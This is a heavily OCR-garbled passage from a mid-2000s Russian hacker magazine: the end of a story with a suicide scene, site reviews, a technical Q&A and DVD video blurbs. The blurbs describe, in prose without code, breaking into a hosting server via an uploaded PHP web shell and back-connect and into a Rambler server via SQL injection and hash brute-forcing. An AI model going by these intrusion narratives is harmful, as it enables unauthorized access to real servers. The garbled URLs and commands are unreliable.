закончи все дела и приходи к нам насовсем. 

А теперь иди, твое время кончается. 

[явь] Это был самый тяжелый выбор, который когда-либо приходи- 
лось делать в жизни. Жизнь марионетки: без памяти, без права выбо- 
ра, фактически без свободы, но все-таки жизнь, или смерть с возмож- 
ным последующим возрождением. А будет оно или нет, он точно не 
знал. Можно ли верить снам? Или это только воображение, фантом, ус- 
лужливо подсунутым подсознанием, чтобы человек не сошел с ума от 
страшной реальности? Находясь вне тела, он разглядывал ботов, как 
когда-то программы. Они были чем-то похожи на здание компании, 
идеальные кристаллы, без единой трещинки. Было видно, что они мо- 
гут размножаться и захватывать новое жизненное пространство, и 
только ограничения в коде их сдерживали. Никакого отката или само- 
ликвидации — ничего. Они были, как раковая опухоль, которая не ос- 
тавляет ни одного шанса. 

Только через два дня тяжелых раздумий он, наконец, решился. В 
конце концов, ничто его здесь не держало. Кто о нем вспомнит? 
Друзья? Так они уже давно где-то потерялись. У них семья, работа, 
свои проблемы. Может и помянут, когда узнают, но плакать точно 
никто не будет. Заказчики? Оно им надо? Мало ли талантливых ре- 
бят? Сетевые знакомые? Стукнут в Аську раз-другой и успокоятся. 
Вот, разве что Марат сочинит от нечего делать красивую легенду о 
гордом программисте. Леха усмехнулся, представив, как духи собе- 
рутся в кружок, а Марат, возлегая как обычно прямо в воздухе, по- 
ведет печальный рассказ, делая многозначительные паузы в самых 
драматичных местах. 

Утро последнего дня было прохладным. Он ждал рассвет на крыше 
своей 16-этажки и мерзнул, прокручивая в памяти снова раз за ра- 
зом все, что удалось вспомнить и сохранить. Когда первые лучи про- 
бились из-за соседних домов, он уже стоял на краю и смотрел, как 
начинается новый день. 

«Прости меня, Господи, но это мой выбор», — Алексей последний раз 
посмотрел на солнце, зажмурился и сделал шаг вперед. 

[грань] Вспышка, тоннель, мгновенный оценивающий взгляд, полный 
любви, яркий свет, очистивший душу от остатков тьмы, снова вспышка. 

[явь] Девушка шла по тропинке с полной корзинкой грибов. Он снова 
стоял на краю поляны и во все глаза смотрел на нее. Только сейчас он 
понял, что раньше все было только сном. Легкий ветер ласкал кожу, 
сотни запахов кружили голову, солнце ласково согревало, каждое рас- 
тение было живым и тихонько пело свою песню. Он сделал два шага и 
очутился на тропинке прямо перед девушкой, готовый теперь навсегда 
утонуть в ее зеленых глазах 0 
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ЭТО МЫ. НАС МНОГО. В ЭТОТ РАЗ ТЫ НАБЛЮДАЕШЬ 
НАШУ КОМАНДУ С ДОВОЛЬНО ИНТЕРЕСНОГО РАКУР- 
СА. ТО, ЧТО ТЫ ВИДИШЬ, — ЭТО ЧАСТЬ ТЕЛА, НА КОТО- 
РОЙ МЫ СИДИМ. ТЕБЕ МЫ ИХ ПОКАЗЫВАЕМ НЕ ДЛЯ 
ТОГО, ЧТОБЫ «ПОКАЗАТЬ ПОПУ», А ЧТОБЫ ПОУЧАСТ- 
ВОВАТЬ В КОНКУРСЕ, В КОТОРОМ МОЖНО И ПРИЗ ВЫ- 
ИГРАТЬ, ЕСЛИ ПРАВИЛЬНО ОТВЕТИТЬ НА ВСЕ ВОПРО- 
СЫ. ТОЧНЕЕ, ДАЖЕ НЕ НА ВОПРОСЫ, А ПРОСТО СО- 
ПОСТАВИТЬ ВЛАДЕЛЬЦЕВ ЗАДНИХ ЧАСТЕЙ ТЕЛ С ИХ 



ИМЕНАМИ. ВСЕГО НАДО ОПРЕДЕЛИТЬ 9 ЧЕЛОВЕК. 
ТАКЖЕ МЫ ПРОСИМ ПРОГОЛОСОВАТЬ ТЕБЯ, ЧЕЙ 
ЗАД, ПО-ТВОЕМУ МНЕНИЮ, ДОЛЖЕН ЗАНЯТЬ ПЕР- 
ВОЕ МЕСТО. ТАК МЫ ОПРЕДЕЛИМ ЛУЧШИЙ ХАКЕРС- 
КИЙ АЗЗ. СВОИ ОТВЕТЫ ПРИСЫЛАЙ НА АДРЕС: 
КОЫКІІВЗ@ВЕАІ_.ХАКЕР.ВІІ. РЕЗУЛЬТАТЫ МЫ ОПУБ- 
ЛИКУЕМ В СЛЕДУЮЩЕМ НОМЕРЕ. ГОЛОСУЙ! ОТ 
ТВОЕГО ГОЛОСА МОЖЕТ ЗАВИСЕТЬ ИСХОД ВСЕХ 
РЕЗУЛЬТАТОВ. 
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Наташа Жукова 
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Хакерский музей 

ІтН-р://Иаск-ехро.ѵоісІ.ги 
Хочешь узнать все о существующих и бывших 
российских хакерских группах? Тогда тебе 
следует посетить сетевой хакерский музей! 
Здесь ты найдешь информацию о таких ко- 
мандах, как ІМегІ, Ѵоіб, Магаіака, Хгоиі, СуЬег 
І_огсІ5, ВІаск І_одіс Теат и еще о многих десят- 
ках известных и малоизвестных групп. Причем 
в музей попадают исключительно русские ко- 
манды! Ты узнаешь год основания группы, ее 
состав, сайт команды со скриншотом и даже 
сможешь прочитать избранные статьи, прямо 
не выходя из музея. Музей постоянно попол- 
няется «экспонатами». 




Новый порядок 

НТСр : //пѳѵуогсіег . Ьох.зк 
Судя по домену ЗК, данный сайт принадле- 
жит словакам, однако вся информация на 
нем представлена исключительно на анг- 
лийском. И думаю, сильно не ошибусь, если 
скажу, что это один из лучших в Интернете 
ресурсов по информационной безопасности. 



Сотни отборных статей и туториалов, утили- 
ты, эксплойты, Ио\лМо, интервью, ссылки, об- 
зоры книг и самые последние новости из ми- 
ра безопасности. Большая часть статей пи- 
шется эксклюзивно для этого ресурса. В рус- 
ском сегменте аналогами являются хакер. ш 
и ЗесигіІуІ_аЬ.ги. 
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Мир сетей х25 

\ллллл/.сІ\л/р.пт.ги 

Хочешь халявного, но убогого и жутко тор- 
мозного инета? Тогда тебе явно надо позна- 
комиться с сетями х25, конечно, если ты еще 
с ними не знаком. На сайте не только дана 




информация по х25, но и предоставлен для 
скачивания весь необходимый софт: скане- 
ры, брутфорсеры, релей-чаты (для удоволь- 
ствия), с некоторыми пояснениями и просты- 
ми скан-листами. Кроме того, можно скачать 
уникальный е- 2 Іпе от авторов сайта под наз- 
ванием Х-БВЕАМ Іасіог. Есть также форум, 
где ты сможешь обменяться опытом с иссле- 
дователями х25-сетей. 

Лаборатория ТРОС 

Шр://1-Пѳрос.ѳхрІоі+ѳг2.огд 

Когда-то в России была самая мощная в ми- 
ре вирусная сцена, но сейчас она зачахла. 
Поэтому отрадно видеть, когда в наши дни 
появляются сайты по разработке вирусов. 
Несколько русских молодых людей объеди- 
нились в «застенках» одной лаборатории, ко- 
торую прозвали ТНе Раззіоп 01 Собе 
І_аЬогаІогу и занялись изучением и написани- 
ем вирусов. Как пишут лаборанты, они кате- 
горически против деструкции в заразе и не 
создают деструктивных вирусов. На сайте ты 
сможешь скачать и опробовать созданные 
ими вирусы и полезные утилиты, а также по- 
читать довольно интересные статьи. 





В гостях у Миллера 

ІтНр : //$у$ро . пагосі . ги 

Денис Миллер — это лектор в Хабаровском го- 
сударственном техническом университете. Как 
ты понимаешь, читает он лекции по ІТ-техноло- 
гиям: программирование, сети, операционные 
системы, администрирование и пр. На сайте 
можно скачать некоторые его лекции и лабо- 
раторные работы. Денис также собрал нехи- 
лую подборку ссылок, книг и прочего материа- 
ла, которые он рекомендует к изучению. Ду- 
маю, каждый сможет найти на его сайте что- 
нибудь интересненькое для себя. Как видишь, 
даже в Хабаровске есть грамотные преподы! 



вой марки. На сайте можно проанализировать 
электронные письма или вообще любой текст, 
подобрать подходящий ник, поискать своих 
однофамильцев или почитать статьи о совре- 
менном фоносемантическом анализе. 



Анализируй это 

ѵухллл/.апаіііі'атіііі.ги 

Что думают о вас люди, когда слышат вашу 
фамилию или имя? Как по тексту письма уз- 
нать психологическое состояние автора? Как 
разумно подобрать имя бренда или фирмы? 
На эти и еще множество вопросов даст ответ 
сайт апаіігіатіііі.ги. Побывав на сайте и вос- 
пользовавшись компьютерной программой 
анализа характеристики звуков русской речи, 
можно определить, какими подсознательными 
значениями обладает то или иное слово. Будь 
то: твой ник в Интернете или название торго- 



Не курим! 

НІ+р://по$токіпд.ги 

Курить или не курить — вопрос не стоит. Пробле- 
ма заключается немного в другом. Чем больше 
пополняется армия курильщиков, тем больше 
становится людей, желающих раз и навсегда по- 
кончить с этой вредной привычкой. Сайт позток- 
іпд.ги призван помочь этим людям. Эта помощь 
представляется во всем многообразии, с бесчис- 
ленным количеством способов и различных 
средств, помогающих завязать с курением раз и 
навсегда. Здесь тебе и советы бывалых бросапь- 
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щиков, и препараты, уменьшающие тягу к сига- 
рете, народные средства. Для слишком запущен- 
ных вариантов прилагается бесплатная помощь 
специалистов-врачей. Сайт будет полезен для 
ознакомления и тем, кто бросает, и тем, кто толь- 
ко начинает свое знакомство с сигаретой. 

Музей угонов 

НТСр://ти2идоп.ги 

Сколько всего на свете музеев? И каких только 
нет: с закаменевшими костями мамонтов, музеи 
оружия различного времени и назначения, есть 
даже музеи пивных бутылок. Но сейчас речь пой- 
дет немного о другом. Перед тобой ресурс, явля- 
ющийся виртуальным музеем автоугонов. На 
сайте собраны в единое целое 1000 и 1 способ 
угона автомобиля, истории про различные дико- 
винные способы кражи четырехколесных средств 
передвижения. Побродив по сайту, я наткнулся на 
обширную коллекцию видео, собранную со всех 
концов света и представляющую собой различ- 
ные интереснейшие способы краж автомобилей, 
подсмотренных либо скрытыми видеокамерами, 
либо снятых случайными очевидцами зс 
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ЗАДАВАЯ ВОПРОС, ПОДУМАЙ! НЕ СТОИТ МНЕ ПОСЫ- 
ЛАТЬ ВОПРОСЫ, ТАК ИЛИ ИНАЧЕ СВЯЗАННЫЕ С ХА- 
КОМ/КРЭКОМ/ФРИКОМ — ДЛЯ ЭТОГО ЕСТЬ НАСК-РАО 
(НА ОКНА О @ НЕАІ- .ХАКЕР Л Ц ) , НЕ СТОИТ ТАКЖЕ ЗАДА- 
ВАТЬ ОТКРОВЕННО ЛАМЕРСКИЕ ВОПРОСЫ, ОТВЕТ НА 
КОТОРЫЕ ТЫ ПРИ ОПРЕДЕЛЕННОМ ЖЕЛАНИИ МО- 
ЖЕШЬ НАЙТИ И САМ. Я НЕ ТЕЛЕПАТ, ПОЭТОМУ КОНК- 
РЕТИЗИРУЙ ВОПРОС, ПРИСЫЛАЙ КАК МОЖНО БОЛЬ- 
ШЕ ИНФОРМАЦИИ. 

О: Что такое динамическая маршрутизация и для чего она применяется? 

А: ІР-маршрутизация — это процесс доставки пакетов внутри сети на ос- 
нове специальных правил (маршрутов). Если сеть состоит всего из нес- 
кольких машин, то проблем с доставкой пакетов быть не должно. Труднос- 
ти начинаются, когда локалка представляет собой соединение нескольких 
подсетей, в каждую из которых входят десятки или даже сотни компьюте- 
ров. В этом случае необходимо использовать роутеры, маршрутизирую- 
щие пакеты из одной подсети в другую. На роутерах могут быть прописа- 
ны правила статической маршрутизации — эти правила жестко зафикси- 
рованы и не могут изменяться. Такая система отлично работает до тех пор, 
пока один из них не выходит из строя — в этом случае часть маршрутов 
ведут «в никуда». Объясняю на примере. Представь, что у нас есть три 
маршрутизаторы А, В и С, каждый из которых обслуживает свой ЕШегпеТ 
сегмент класса С (маска подсети 255.255.255.0). Кроме того, каждый 
маршрутизатор имеет РРР-соединение (например, через модем) с двумя 
другими, то есть сеть имеет вид треугольника. Таким образом, правила 
маршрутизации на роутере А могут быть заданы следующим образом: 

# гоиіе асШ -пеі 1 92.1 68.1 .0 пеітазк 255.255.255.0 еШО 

# гоиіе асШ -пеі 192.168.2.0 пеітазк 255.255.255.0 рррО 

# гоиіе асМ -пеѣ 192.168.3.0 пеітазк 255.255.255.0 рррі 






Это очень простой случай, и такая система совершенно точно будет от- 
лично работать. Но что будет, если связь между роутерами А и В обор- 
вется? В этом случае компьютеры из сети А уже не смогут «достучать- 
ся» до машинами из сегмента В, так как маршрутизатор будет пытаться 
передать пакеты по несуществующему соединению рррО. С другой сто- 
роны, они по-прежнему смогут связаться с компьютерами из сегмента 
С, а те в свою очередь — с машинами из сегмента В. Так почему бы 
этим не воспользоваться и временно изменить маршруты, чтобы паке- 
ты для сегмента В передавали через маршрутизатор С? Собственно, из- 
менение маршрутов в зависимости от текущей конфигурации сети — 
это и есть основной принцип динамической маршрутизации, реализо- 
ванной в протоколах ВІР (Протокол Информации о Маршрутизации) и 
ОЗРР (Протокол Кратчайшего Открытого Пути). 

О: Некоторые люди собирают свои собственные дистрибутивы І_іпих. 
Ума не приложу, каким образом они это делают — неужели «с нуля»? 

А: А почему бы, собственно, нет? Для человека, не понаслышке знако- 
мого с архитектурой Ыпих, — это вполне реальная задача. Тем же, кто 
только начинает осваивать внутренности пингвина, обязательно долж- 
ны прийтись по душе скрипты от известного сайта Ыпих Ргот ЗсгаісІі 
(і ѵѵѵѵѵѵ.ііпихіготзсгаісіі.огд ). Данный ресурс поддерживает 3 основных про- 





екта: І_Р8, АІ_РЗ (Аиіотаіесі І_РЗ) — набор скриптов для самых ленивых, 
которые не хотят глубоко вникать в процесс создания дистрибутива, и 
ВІ_РЗ — инструмент для профи, содержащий в себе большое количест- 
во пакетов и приложений, из которых можно создать мощную І_РЗ-сис- 
тему. С помощью любого набора этих скриптов можно легко создать та- 
кой дистрибутив, который будет занимать жалких 100 — 200 Мбайт, но 
работать ничуть не хуже, чем навороченные Мапсігаке и другие подоб- 
ные дистрибутивы. А если ты еще не успел основательно познакомить- 
ся с линуксом, то рекомендую опробовать эти скрипты в обязательном 
порядке. О внутреннем устройстве оси ты совершенно точно узнаешь 
много нового. 

О: Недавно узнал, что для обозначения конца строки в ІІпіх- и ѴѴіпбоѵѵз- 
системах используются разные символы. Почему? 

А: Действительно, в 003 и ѴѴіпсІоѵѵз конец строки обозначается сразу 
двумя символами — возврата каретки (<СВ>) и перевода строки 
(<І_Р>). В тоже время в ІІІМІХ используется только один из них — сим- 
вол перевода строки. В Мае 03 X также используется только один 



да исполняемый файл сагіЬе.зіз. В этом случае у пользователя принима- 
ющего телефона на экран выводится сообщение с предложением при- 
нять сообщение. Единственное, чем может насолить червь, это неболь- 
шое подтормаживание телефона и быстрая разрядка батареи из-за пос- 
тоянного ВІиеІооІП-сканирования. Для того чтобы убить вирус, достаточ- 
но скачать утилиту ЭесаЫг ( уѵуѵуѵ. казрегзку. сот/сіо ѵѵпіоа сіз/ѵѵар/сіо ѵѵп - 
ІоасІз/сІесаЫг.зіз), или же вручную удалить файлы из папок: 

сі/зузіеіп/зутЬіапзесигесІаіа/сагіЬезесигіІутападег/ 

с:/зузіет/гесодз/ и 

еѴзузІет/аррз/сагіЬе/ 

О: Г рядет релиз б-ой версии РегІ — какой он будет, и что изменится? 

А: Самое главное: РегІ станет еще более объектно-ориентированным. 
Большинство нововведений связано именно с этим моментом, поэто- 
му я даже не буду их упоминать. Если ты большой приверженец объ- 
ектно-ориентированного подхода, то тебя обязательно порадуют 
фишки, перенятые от С++ и ^ѵа. С другой стороны, никто не заста- 
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символ, но уже символ возврата каретки. Сложно сказать, почему сло- 
жилось именно так, а не иначе. 

Это традиция, которая берет свои корни еще много лет назад и 
вряд ли когда-либо измениться. Но опасаться этого не стоит. Боль- 
шинство текстовых редакторов (ІШгаЕсШ — ѵѵмѵѵ.иІІгаесШ.сот, 
ЕтЕсШог — ѵѵѵѵѵѵ.етесіііог.сот, встроенный редактор в файловом 
менеджере РАП), компиляторов и любой другой профессиональный 
софт отлично распознает используемый в файле символ конца 
строки и корректно его обрабатывает. 

О: Что за мобильный вирус СаЬіг и как его удалить из телефона? 

А: ѴѴогт.ЗутЬОЗ.СаЬіг.а, как его идентифицируют в лаборатории Кас- 
перского, является первым вирусом, который для распространения ис- 
пользует слабые места ВІиеІооІИ. 

Уязвимой является популярная платформа ЗутЬіап Зегіез 60, на которой 
основаны многие популярные смартфоны. Таких трубок не очень много 
в России, тем не менее, в Москве случаи заражения этим вирусом случа- 
лись не раз. Сразу скажу: опасности он никакой не несет. При каждом 
включении зараженного телефона червь получает управление и начина- 
ет сканировать список активных ВІиеІооІИ-соединений. Затем червь вы- 
бирает первое доступное соединение из списка и пытается передать ту- 



вит писать через объекты абсолютно все — можешь продолжать прог- 
раммировать точно так же, как ты это делал ранее. Тем более что 
Ларри Уолл (создатель языка) пообещал, что РегІ останется самим 
собой, хотя и приобретет ряд новых достоинств. В частности, будут 
несколько изменены регулярные выражения {ѵѵѵѵѵѵ-128.іЬт.сот/сІеѵеІ- 
орегѵѵогкз/Ііпих/НЬгагу/І-сргедех.ЫтІ), а функции наконец-то смогут по- 
лучать параметры через переменные, а не через пресловутую 
конструкцию @_. Еще одно новшество заключается в том, что прог- 
раммы смогут быть компилированы в байт-код. Это не только увели- 
чит скорость их выполнения, но предоставит желанную возможность 
спрятать исходные тексты от посторонних глаз. 6-ая версия РегГа бу- 
дет коренным образом отличаться от того, что мы видели ранее. В то 
же время это будет последний раз, когда РегІ будет подвергаться гло- 
бальному реформированию — так сказать, раз и навсегда. Подробнее 
о Регіб можешь прочитать на сайтах: сіеѵ.регі.огд/регіб, тт /.регіб.ги. А 
если хочешь попробовать часть нововведений, то установи на своей 
машине РХРегІ (ѵѵѵѵѵѵ .сосіергоіесі .сот/іооіз/рхрегі .азр) . 

О: Мне нужен хороший шелл, на котором я смогу компилировать и вы- 
полнять любые С++-приложения. Обычного зИеІГа мне мало, поэтому 
хочу купить себе виртуальный выделенный сервер. Во время выбора по- 
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явился вопрос: одни провайдеры обозначают эту услугу ѴРЗ. Другие — 
ѴйЗ? А в чем разница? 

А: На самом деле, это одно и тоже. И ѴРЗ (Ѵігіиаі Ргіѵаіе Зегѵег), и ѴЭЗ 
(Ѵігіиаі Оесіісаіесі Зегѵег) предоставляют тебе полный рут-шелл и не- 
большую часть ресурсов удаленной машины. Второе название техноло- 
гии появилось из-за нежелания мелких хостинг-компаний покупать па- 
тенты на использование этой услуги. И получилось, что обозначение 
ѴРЗ более распространено на западе, а ѴЭЗ обычно используется оте- 
чественными хостерами. 

О: В Интернете и в газетах сейчас публикуется огромное количество 
привлекательных объявлений по поводу сотовой связи. Одно из них — 
«все входящие звонки по цене внутрисетевых». Объясните, как это воз- 
можно? Для меня это очень актуально, так как мне очень много звонят 
с домашних телефонов, что, естественно, влетает в копеечку. 

А: На самом деле, ничего сверхъестественного в такой схеме нет. На 
твой городской номер попросту устанавливается специальный де- 
вайс (так называемый мост), который, используя еще один сотовый 
телефон, перенаправляет звонки на твою настоящую мобилу. Когда 
поступает звонок на домашний телефон, мост с помощью второго со- 
тового телефона дозванивается до тебя и по специальной схеме на- 
чинает транслировать голос с домашнего телефона на сотовый и, со- 
ответственно, с сотового на домашний. При таком раскладе ты опла- 
чиваешь только исходящие звонки с мобильника, который установ- 
лен дома. А так как внутрисетевые звонки традиционно тарифициру- 
ются дешевле всего (особенно вкупе с услугой «любимый номер»), 
на этом деле можно прилично сэкономить. 

Более того, большинство приборов поддерживают эту же самую схе- 
му, но в обратном направлении. То есть ты не только можешь прини- 
мать звонки с городских телефонов, но и звонить на них, оплачивая 
лишь разговоры внутри сети. 

Примером подобного устройства является МоЫРох 696, который легко 
можно найти в Москве. Замечу, что он умеет работать в многопользова- 
тельском режиме и выполнять роль своеобразной мини-АТС. В этом 
случае, после набора домашнего номера звонящему придется набирать 
еще добавочный номер, который приписан к нужному ему абоненту. 
Стоит такой девайс около 100$, не считая стоимости дополнительного 
сотового телефона, который обойдется еще в 30 — 50$ 

О: В ближайшее время собираюсь приобрести мультиформатный ОѴО- 
ВѴѴ привод. Друзья посоветовали брать только те модели, которые под- 
держивают функцию Віізейіпд, но толково объяснить, зачем она нужна, 
так и не смогли... :) Что скажешь? 

А: Ты когда-нибудь пробовал воспроизвести свежезаписанную болван- 
ку в старой модели магнитолы или ОѴЭ-плеера? Скорее всего, ничего 
хорошего из этой затеи не вышло, так как большинство древней техни- 
ки попросту отказываются с ними работать. 

Вот как раз в этом случае и будет полезной поддержка функции 
Віізеиіпд, которая позволяет изменить бит, отвечающий за тип но- 
сителя (РЮМ, -В, +В), — так называемый Воок Туре. Этот бит на- 
ходится в І_еасІ-іп области диска и может принимать одно из трех 
значений. Но изменить его можно только в случае использования 
ОѴО-і-В болванок, так как у ОѴО-В он строго прописан по умолча- 
нию. Если хочешь, чтобы диск гарантировано прочитался на лю- 
бом, даже самом древнем плеере, необходимо установить Воок 
Туре равным ОѴО-ВОМ. Опытные гики рекомендуют устанавливать 
Воок Туре и для двухслойных (ЭѴО+ВЭ ОІ_) болванок, так как в про- 
тивном случае они вполне могут не прочитается даже на самых 
современных ОѴО-плеерах. 

О: Объясни, как из линукса можно подключиться к расшаренным ресур- 
сам ѴѴіпсІоѵѵз компьютера? 

А: Любые действия с зИаге-ресурсами в Ыпих'е осуществляются с по- 
мощью специального набора утилит ЗатЬа. При этом возможна рабо- 
та не только в качестве клиента, то есть подключение к удаленным ре- 
сурсам, но и сервера, когда расшаренные папки создаются непосред- 
ственно в Ыпих'е. Для доступа к подобным ресурсам используются ути- 
литы зтЬсІіепІ, зтЬтоипІ и зтЬитоипі. Предлагаю кратко остановит- 
ся на каждой из них. 

Первая прога — зтЬсІіепІ — представляет собой удобную консольную 
утилиту для работы с удаленными ресурсами и своим внешним видом 
сильно напоминает РТР-клиент. Я чаще всего использую ее для прос- 
мотра списка расшаренных ресурсов удаленного компьютера. Если 
имя этого компьютера ЗЕВѴЕВ, то сделать это можно следующим об- 
разом: 

# зтЬсІіепІ -І_ ЗЕВѴЕВ 



Иногда бывает необходимо дополнительно указать имя пользователя, и 
в этом случае команда выглядит примерно так: 

# зтЬсІіепІ -II изег -І_ ЗЕВѴЕВ 

После того, как информация об открытых ресурсах получена, можно 
примонтировать одну из папок, воспользовавшись специальной утили- 
той зтЬтоипІ. Общий синтаксис команды имеет следующий вид: зтЬ- 
тоипі <адрес папки> сточка монтирования> -о изегпате=<имя пользо- 
вателя>,раззѵѵогсІ=<пароль>. Таким образом, подключить удаленную 
папку //зегѵег/зІіаге_ІоІсІег можно с помощью следующей команды: 

#зтЬтоип{ //зегѵег/зІпаге_ТоІсІег /тпѴ$Ііаге_ІоІсІег -о и5егпате=5Іер,ра53- 
ѵѵогсІ=разз 

Естественно, что перед ее выполнением нужно позаботиться о сущест- 
вовании /тпІ/зІпаге_іоІбег. 

Что касается последней команды зтЬитоипІ, то позволяет размонти- 
ровать файловую систему, смонтированную командой зтЬгтюипГ Ко- 
нечно, это можно было бы сделать с помощью стандартной команды 
итоипі, но ее, как известно, вправе выполнять исключительно админи- 
стратор, то есть гооі. 

Исполняем: 

$ зтЬитоипІ/тпѴзІіаге_ІоІсІег 



О: Посоветуй, пожалуйста, хороший файловый менеджер для КПК 
(платформа РоскеІРС) 

А: Не секрет, что существует уйма самых разнообразных шеллов для 
карманных компьютеров. Но в последнее время я особенно подсел на 
Везсо Ехріогег 2003: просто разработчики сделали все именно так, как 
бы сделал я :). Во-первых, это хороший набор полезных функций: отк- 
рытие файла с помощью произвольной программы, удобная установка 
ассоциаций файлов и приложений, встроенный 2ІР-архиватор, шустрая 
смотрелка графических файлов. Во-вторых, очень качественная реали- 
зация удаленной передачи данных через РТР, ВІиеІооІН и ѴѴі-Рі. Так, для 
того чтобы передать файл через ВІиеІооІП, потребуется всего 3 клика — 
в отличие от других файловых менеджеров, где для этого пришлось бы 
копаться в многочисленных менюшках (эх, портировали бы под КПК 
ІМогѣэп соттапсіег 5.0 — прим. Лозовского). Помимо этого, привлекает 
и внешний вид: Везсо Ехріогег сильно напоминает проводник ѴѴіпсІоѵѵз 
поддерживает Огад'п'Огор и имеет удобный поиск файлов. 

О: Мой сайт постоянно ОРоЗ'ят, причем ботнеты преимущественно на- 
ходятся в азиатских странах. Их можно каким-нибудь образом нейтра- 
лизовать или забанить? 

А: Если твой сайт установлен на выделенном сервере и ты имеешь 
к нему полный доступ, то тебе надо воспользоваться файрволом. 
Чтобы не морочить себе голову с поиском нужных ІР-подсетей сос- 
тавлением правил для файрвола, рекомендую посетить сайт ѵѵт л/.сіау- 
отоп.пеі/Іѵѵ, где выложена отличная подборка всего необходимого. 
Самое интересное — это заранее подготовленные правила для раз- 
нообразных сервисов (ірТ, ірТѵѵ, заіепу, іргапде, ВІІ\Ю, АрасІіе, ІРТА- 
ВІ_ЕЗ), которые практически полностью блокируют подключения с 
азиатских ІР-адресов. 

О: Говорят, что МісгозоЙ выпустила хороший продукт, нацеленный на 
обеспечение и своевременное обновление ѴѴіпсІоѵѵз-систем. Можешь 
рассказать подробнее? 

А: Что верно — то верно. Как известно, Майкрософт выпускает 
исключительно хорошие и своевременные продукты :). Имя новинки — 
МісгозоК Вазеііпе Зесигііу Апаіугег 2.0, которую с недавнего времени 
можно загрузить с официального сайта МісгозоК ( ѵѵѵѵѵѵ.тісгозоП.сот ). 
По сути, ничего особенного она собой не представляет. Основная зада- 
ча — следить за безопасностью всех основных ѴѴіпсІоѵѵз-систем (2000, 
ХР, Зегѵег 2003, будущей Ѵізіа), а также ряда других продуктов (Іпіегпеі 
Ехріогег, М3 СШісе, ЕхсИапде, ЗОІ_ Зегѵег и т.д.). Однако фактически 
контроль сводится к банальной проверке локальной и удаленных сис- 
тем на своевременное обновление. Если в наборе установленных пат- 
чей отсутствует какая-то заплатка, то администратору предлагается 
загрузить ее из Сети, после чего обновить все системы с помощью 
ѴѴіпсІоѵѵз Зегѵег ІІрбаіе Зегѵісез ( уѵуѵуѵ. тісюзоіХ.сот/уѵіпбо ѵѵззегѵегзуз- 
іет/ ирбаіезегѵісез) 

Помимо этого, проверяется набор некоторых критических настроек (па- 
ролей по умолчанию, например), которые почему-то МісгозоК хочет исп- 
равить не в самих продуктах, а с помощью подобных приложений. 
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[Взлом хостинга: часть первая] 
[Автор: зазЫкз ] 




Давным-давно, в далекой-далекой галактике, 
одному челу понадобилось получить акцесс к 
машине одного довольно крупного городского 
хостера, на борту которого было несколько 
трехгигогерцовых процов, широкий канал и уй- 
ма оперативки — просто лакомый кусочек. Для 
начала, чтобы получить хотя бы какой-нибудь 
доступ к серверу, наш протагонист лезет на 
страницу, содержащую список клиентских сай- 
тов, и досаточно быстро находит уязвимость на 
одном из них. В его админке подходила станда- 
ртная комбинация «логин:пароль», поэтому лег- 
ким движением руки он попал внутрь. Как выяс- 
нилось, ничего криминального в админской па- 
нели управления сделать нельзя, кроме как заг- 
рузить НітІ-страницу со своего компа на сер- 
вер. Ну почему бы взломщику не залить туда 
обожаемый зузІет() на рнр? Аплодим рнр-стра- 
ницу на сервак и наблюдаем за результатом. 
Несмотря на то, что рнр-код в странице рабо- 
тоспособен, системные функции отключены, а 



поэтому о выполнении команд можно забыть. 
Тем не менее, выход все же удается найти — с 
помощью стандартных РНР-функций чел осу- 
ществил поиск доступной на запись диру и за- 
качал на машину еѵаІ_рПр шелл, которому в 
дальнейшем и скармливались самопальные 
РНР-аналоги зузіет-вызовов. Впрочем, ничего 
толкового, кроме версии ОС (есНо рПр_ипате()), 
узнать не удалось. И тут мелькнула мысль — 
если РНР не дает нужной отдачи, можно попы- 
таться запустить сді-скрипты. Но каждый раз 
заливать вручную через Іореп() и Іри1з() их неу- 
добно, и чтобы как-то упростить процесс транс- 
портировки файлов, главный герой заливает 
довольно-таки популярный ВЗТ-шелл (в кото- 
ром встроена возможность манипуляции фай- 
лами). Но тут случается неожиданное — ВЗТ 
ѵѵеЬ-зИеІІ оказался вполне работоспособен, и 
выполнять команды на машине с поЬобу-права- 
ми стало вполне реально! Но почему же шелл 
заработал? А все дело в том, что администра- 
тор хостинга не включил заіе тобе, а вручную 
поотрубал функции в рИр.іпі. По идее, все долж- 
но было работать как часы, но рут ошибся, за- 
быв про рореп(), через который и работал веб- 
шелл от ВизИ. В мгновение ока был организо- 
ван Ьаск-соппесі (в шелл, кстати, встроено нес- 
колько бэкдоров), и взломщик стал ползать по 
винту хостингового сервера. Впрочем, нечего 
особо полезного выбить не удалось, так как 
большинство сплоитов на дырявом ядре не ра- 
ботали (так как собраны на другой тачке, дсс 
было запрещено запускать), и отмычка на 5МР- 
машины уводила сервак в даун — вот и приш- 
лось довольствоваться поЬосІу-правами. Но 
после небольшого исследования машины обна- 
ружилась одна интересная особенность — ока- 
зывается, этот сервак лишь второстепенный, а 
главный имеет совсем другой ІР. А это значит, 
что операция по захвату аккаунтов не заверше- 
на, и все самое интересное еще только впере- 
ди. Но это мы покажем лишь в следующем вы- 
пуске ][. 

[Шалости на гатЫег.ш ] 

[Автор: бокк21 ] 

В этом видео хакер демонстрирует взлом одно- 
го из серверов гатЫег.ш, отвечающий за раз- 
дел «недвижимость». В начале он находит ЗОІ_- 
Іпіесііоп в одном из скриптов движка, но решает 
не останавливаться на достигнутом, продолжая 
искать прочие уязвимости на сайте. Вдруг он не- 





ожиданно натыкается на обычный ріір-іпсіисіе 
баг. Не медля ни минуты, хакер заливает доста- 
точно сложным путем шелл-скрипт на сервер. 
Получив удобный веб-доступ к управлению опе- 
рационной системой рамблеровского сервера, 
сетевой негодяй находит в конфигурационных 
файлах апача не только линк на админский ин- 
терфейс, но и какие-то хэши паролей, зашифро- 
ванные алгоритмом ОЕЗ. После непродолжи- 
тельного брута находятся два пароля. Один из 
них подходит не только к админке, но и к другим 
достаточно интересным ресурсам сетевого ги- 
ганта. Для полного понимания действий в видео- 
ролике, рекомендуются прочитать соответству- 
ющую статью, которую ты сможешь найти в сле- 
дующем выпуске любимого журнала. 

[І_іпих Мапбгіѵа 2005 1_ітйесІ Есііііоп (Мапбгаке 10.2)] 

Да! Ты, наконец-то, этого дождался... В этот раз 
мы выложили на 0\Ю полноценную линуксовую 
ось — І_іпих Мапбгіѵа 2005 Ытііесі ЕсІШоп. Дистри- 
бутив разбит на 3 дисках, представленных на 0\Ю 
в виде ІЗО-файлов. Просто сделай из них СО-дис- 
ки, загружайся с первого из них и смело присту- 
пай к установке. К счастью, установщик имеет 
очень простой дружественный интерфейс на рус- 
ском языке, поэтому проблем с инсталляцией воз- 
